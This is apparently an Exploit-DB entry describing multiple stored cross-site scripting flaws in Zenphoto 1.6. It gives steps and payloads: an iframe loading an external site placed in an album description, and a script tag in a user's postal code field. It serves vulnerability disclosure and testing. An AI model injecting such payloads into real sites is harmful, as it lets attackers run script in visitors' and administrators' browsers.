9be142a874
7 changes to exploits/shellcodes/ghdb Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit) SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated) Ulicms 2023.1 - create admin user via mass assignment WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS) Zenphoto 1.6 - Multiple stored XSS Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation
28 lines
No EOL
947 B
Text
28 lines
No EOL
947 B
Text
Exploit Title: Zenphoto 1.6 - Multiple stored XSS
|
|
Application: Zenphoto-1.6 xss poc
|
|
Version: 1.6
|
|
Bugs: XSS
|
|
Technology: PHP
|
|
Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/
|
|
Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip
|
|
Date of found: 01-05-2023
|
|
Author: Mirabbas Ağalarov
|
|
Tested on: Linux
|
|
|
|
|
|
2. Technical Details & POC
|
|
========================================
|
|
###XSS-1###
|
|
steps:
|
|
1. create new album
|
|
2. write Album Description : <iframe src="https://14.rs"></iframe>
|
|
3. save and view album http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/
|
|
|
|
=====================================================
|
|
###XSS-2###
|
|
steps:
|
|
1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)
|
|
2.change postal code as <script>alert(4)</script>
|
|
3.if admin user information import as html , xss will trigger
|
|
|
|
poc video : https://youtu.be/JKdC980ZbLY |